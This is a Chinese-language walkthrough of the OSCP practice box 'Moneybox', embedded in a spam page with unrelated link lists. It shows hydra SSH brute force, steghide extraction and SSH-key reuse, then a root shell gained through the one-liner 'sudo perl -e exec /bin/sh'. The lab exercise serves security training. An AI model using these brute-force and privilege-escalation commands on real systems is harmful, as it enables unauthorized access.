当前位置: 首页 > news >正文

建设通是正规网站吗wordpress 缓存机制

建设通是正规网站吗,wordpress 缓存机制,南通企业网站有哪些,宿州建设银行网站OSCP系列靶场-Esay-Moneybox 目录 OSCP系列靶场-Esay-Moneybox总结准备工作信息收集-端口扫描目标开放端口收集目标端口对应服务探测 信息收集-端口测试21-FTP端口的信息收集21-FTP版本版本信息21-FTP端口匿名登录测试(存在)21-FTP端口-文件GET收集21-FTP端口-PUT上传测试 22-S…OSCP系列靶场-Esay-Moneybox 目录 OSCP系列靶场-Esay-Moneybox总结准备工作信息收集-端口扫描目标开放端口收集目标端口对应服务探测 信息收集-端口测试21-FTP端口的信息收集21-FTP版本版本信息21-FTP端口匿名登录测试(存在)21-FTP端口-文件GET收集21-FTP端口-PUT上传测试 22-SSH端口的信息收集22-SSH端口版本信息与MSF利用22-SSH协议支持的登录方式22-SSH手动登录尝试(无)22-SSH弱口令爆破(静静等待) 80-HTTP端口的信息收集信息收集-HTML隐藏信息查看信息收集-目录扫描信息收集-目录扫描初步 信息收集-目录访问/blogs/端点访问/S3cr3t-T3xt端点访问 漏洞利用-getwebshellkey利用信息泄露获得用户名SSH爆破登录22-SSH账号密码登录 内网遨游-getshellFLAG1获取信息收集-内网基础信息收集检测Linux操作系统的发行版本检测Linux操作系统的内核版本检测当前用户的权限列举出所有的sudo文件列举出所有suid文件/etc/passwd权限收集/etc/shadow权限收集getcap标志进程收集列举定时任务查看历史信息列举出所有的sudo文件 利用sudo -l寻找perl权限提升FLAG2获取 总结 总结 getwebshell : 目录扫描发现目录 → HTML中发现隐藏key → FTP匿名发现图片 → 隐写术解开图片秘密 → 提示用户名爆破 → hyrda爆破ssh进入内部 提 权 思 路 : history发现存在私钥 → 登录其他用户 → perl权限提升 准备工作 启动VPN 获取攻击机IP → 192.168.45.191 启动靶机 获取目标机器IP → 192.168.162.230 信息收集-端口扫描 目标开放端口收集 Nmap开放端口扫描2次(多次扫描减少误扫) sudo nmap --min-rate 10000 -p- 192.168.162.230PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http开放的端口-→21,22,80 目标端口对应服务探测 # tcp探测 sudo nmap -sT -sV -O -sC -p21,22,80 192.168.162.230PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian))信息收集-端口测试 21-FTP端口的信息收集 21-FTP版本版本信息 通过Nmap探测获得FTP的版本信息可以大致推测FTP的配置文件位置 Nmap探测信息为21/tcp open ftp vsftpd 3.0.3 # ftp配置文件位置 /etc/vsftpd.conf21-FTP端口匿名登录测试(存在) 尝试匿名账号anonymous以及无密码进行登录测试 # 利用ftp协议ip进行连接测试 ftp 192.168.162.230 Name: anonymous21-FTP端口-文件GET收集 登录FTP之后利用ls查看存在哪些目录翻阅的同时查看一下文件权限 利用GET下载文件 # binary 以二进制模式传输文件保证文件完整 ftp → binary # 查看目录结构 ftp → ls -al # cd 查看存储的文件 ftp → cd [file_date_name] # get 下载文件 ftp → get [file_name]发现了trytofind.jpg下载到了本地 打开是一张纯粹的图片推测有隐写术 21-FTP端口-PUT上传测试 测试是否可以利用PUT上传文件 # put 上传文件 ftp → put [file_name]不具备上传功能 22-SSH端口的信息收集 22-SSH端口版本信息与MSF利用 通过Nmap探测获得SSH的版本信息可以尝试利用 探测版本为OpenSSH 7.9p1 Debian 10deb10u2 (protocol 2.0) # 搜索对应脚本 msf6 → searchsploit openssh 7.9无 22-SSH协议支持的登录方式 通过Nmap探测获得SSH的版本信息在获取到某个用户名之后尝试 sudo ssh root 192.168.162.230 -v显示publickey、password就是支持密钥以及密码登录 22-SSH手动登录尝试(无) 因为支持密码登录尝试root账户的密码弱密码尝试 sudo ssh root 192.168.162.230 -p 22 # 密码尝试 password → root弱密码尝试失败 22-SSH弱口令爆破(静静等待) 因为支持密码登录尝试root账户的密码爆破利用工具hydra线程-t为6 sudo hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.162.230 ssh -s 22挂着工具进行爆破我们尝试后续信息收集 80-HTTP端口的信息收集 访问 http://192.168.162.230:80 不是CMS我们直接从HTML隐藏信息收集开始 网站说很简单我不信(︿̫̿☆) 信息收集-HTML隐藏信息查看 # 包括文章中是否写明一些敏感信息 curl http://192.168.162.230:80无隐藏内容 信息收集-目录扫描 信息收集-目录扫描初步 dirsearch -u http://192.168.162.230:80 -x 302,403通过扫描发现了一个新的端点/blogs/ 因为扫出了目录深层次的扫描待选 信息收集-目录扫描(后缀) 信息收集-目录扫描(深度/大字典) 信息收集-目录扫描(深度/大字典后缀)信息收集-目录访问 /blogs/端点访问 从本文的消息我们可以发现黑客黑入了系统并说明没有任何的防护设备 curl了一下发现了新的隐藏路径S3cr3t-T3xt /S3cr3t-T3xt端点访问 提示是没有 再curl了一下发现了新内容…一个key 3xtr4ctd4t4 漏洞利用-getwebshell key利用 根据现有内容key应该不代表密码之前有一张图片可能存在隐写术推测是它的密码 通过CHATGPT推荐使用工具 steghide 通过chatgpt获取对应的工具使用方式 steghide extract -sf -xf -p 其中 是包含隐藏信息的图像文件 是提取的信息输出文件 是解密隐藏信息的密码 修改成我们需要的样子 steghide extract -sf trytofind.jpg -xf mian.txt password → 3xtr4ctd4t4成功获得main.txt 信息泄露获得用户名 打开发现内容 确定密码很简单并且用户名是renu Hello..... renuI tell you something Important.Your Password is too Week So Change Your Password Dont Underestimate it....... SSH爆破登录 这样我们可以尝试爆破一下renu的账户利用工具hyrda # -l 指定用户名 -P指定密码字典 hydra -l renu -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.162.230 ssh -s 22成功得到了账号密码信息 [22][ssh] host: 192.168.162.230 login: renu password: 98765432122-SSH账号密码登录 获取账号密码之后利用SSH进行登录 sudo ssh renu 192.168.162.230 -p22 password → 987654321成功打入内部第一步完成 内网遨游-getshell FLAG1获取 renu MoneyBox:~$ find / -name local.txt 2→/dev/null /home/renu/local.txt renu MoneyBox:~$ cat /home/renu/local.txt ad71d6f825f157311d017a8bd94a7e03信息收集-内网基础信息收集 提权的本质在于枚举在获取shell之后我们要进行内网信息的收集都是为了提权做准备 检测Linux操作系统的发行版本 较老的Ubuntu以及Linux系统可以overlayfs提权 # 确定发行版本 renu MoneyBox:~$ lsb_release -a No LSB modules are available. Distributor ID: Debian Description: Debian GNU/Linux 10 (buster) Release: 10 Codename: buster发行版本为Debian不太能overlayfs提权 检测Linux操作系统的内核版本 较低的内核版本可以进行脏牛提权 renu MoneyBox:~$ uname -a Linux MoneyBox 4.19.0-22-amd64 #1 SMP Debian 4.19.260-1 (2022-09-29) x86_64 GNU/Linux内核版本为4.19.0 检测当前用户的权限 renu MoneyBox:~$ id uid1001(renu) gid1001(renu) groups1001(renu)列举出所有的sudo文件 查找具有sudo权限且不需要密码的可提权文件 如果发现sudo -l有东西的话 访问 https://gtfobins.github.io 寻找 # 利用sudo -l寻找 sudo -l发现需要密码尝试987654321失败 列举出所有suid文件 如果发现us有东西的话 访问 https://gtfobins.github.io 寻找 # -perm 文件权限 find / -perm -us -type f 2→/dev/null/etc/passwd权限收集 如果/etc/passwd具有写入权限可以尝试覆盖密码提权 renu MoneyBox:~$ ls -al /etc/passwd -rw-r--r-- 1 root root 1486 Feb 26 2021 /etc/passwd/etc/shadow权限收集 如果/etc/shadow具有写入权限可以尝试覆盖密码提权如果/etc/shadow具有可读权限可以爆破密码 renu MoneyBox:~$ ls -al /etc/shadow -rw-r----- 1 root shadow 1095 Oct 11 2022 /etc/shadowgetcap标志进程收集 高版本下suid列举不全查看getcap # 探查有CAP_SETUID标志的进程 /usr/sbin/getcap -r / 2→/dev/null列举定时任务 查找所有的定时任务并且查看定时任务是否具有修改权限 # 寻找定时任务并修改进行提权 cat /etc/crontab查看历史信息 可能用户留下的历史信息具有有用的信息 history发现存在登录到其他用户的历史命令 ssh -i id_rsa lily 192.168.43.8查看一下本用户/home目录下是否存在SSH密钥 再查看一下lily目录下是否存在authorized keys 确认存在之后尝试登录lily的用户 # 修改一下ip ssh -i id_rsa lily 192.168.162.230登录成功准备进行新的信息收集 列举出所有的sudo文件 查找具有sudo权限且不需要密码的可提权文件 利用sudo -l寻找 lily MoneyBox:~$ sudo -l Matching Defaults entries for lily on MoneyBox:env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser lily may run the following commands on MoneyBox:(ALL : ALL) NOPASSWD: /usr/bin/perl看到了内容 会心一笑 perl权限提升 如果发现有东西的话 访问 https://gtfobins.github.io 寻找 sudo perl -e exec /bin/sh;找到了提权的命令提权成功 lily MoneyBox:~$ sudo perl -e exec /bin/sh; # is /bin/sh: 1: is: not found # id uid0(root) gid0(root) groups0(root)FLAG2获取 # cat /root/proof.txt 7b0bce8f4b59a3db7d173f3e833e50f8完结撒花~总结 查看历史记录也是一件很重要的事情
http://www.hkea.cn/news/14480769/

相关文章:

  • 建建设网站的漳州网站建设去博大a优
  • 青岛建站费用仿 手机 网站模板html源码
  • 选片 网站 建设微商客源人脉app下载
  • 用个人的信息备案网站什么网站可以接装修活
  • 国内有做网游评测的网站么海口制作网站
  • 网站建设规划书河北做网站的公司在哪
  • 方维制网站重庆做网站最好的
  • 如何用ps做网站界面国家重点高新技术企业名单
  • 网站不换域名换空间做视频解析网站
  • 网站建设合同书(范本)淘宝网站建设教程视频教程
  • 设计手机网站公司建设官方网站请示
  • 惠州网站小程序建设建设银行信用卡网站查询
  • 编程 朋友 做网站建网站要多少费用
  • 备案网站建设方案书全景网投资者关系互动平台
  • 广州市照明建设管理中心网站3030wa网站开发学校
  • 定制产品网站一键logo生成器
  • 二手车网站模板建设镇江网站制作价格
  • 网站建设公司的发展前景制作企业网站页面多少钱
  • 网站设置仅某浏览器大数据营销的作用
  • 网站流程图制作软件张家港 网站制作
  • 网站建设外包建设公司官方网站首页
  • 开发网站私活免费学做网站
  • 建网站的模块简述网站建设在作用
  • 公司内部网站系统义乌做网站公司哪家好
  • 霸州网站建设学校文化建设网站
  • 漯河市源汇区建设局网站万网解压缩wordpress
  • 自己学建网站软件开发专业大专学校排名
  • .net 网站开发视频南宁市建设厅网站
  • 徐州建设工程网站产品宣传短视频制作
  • 网站建设网站优化织梦怎么查看网站点击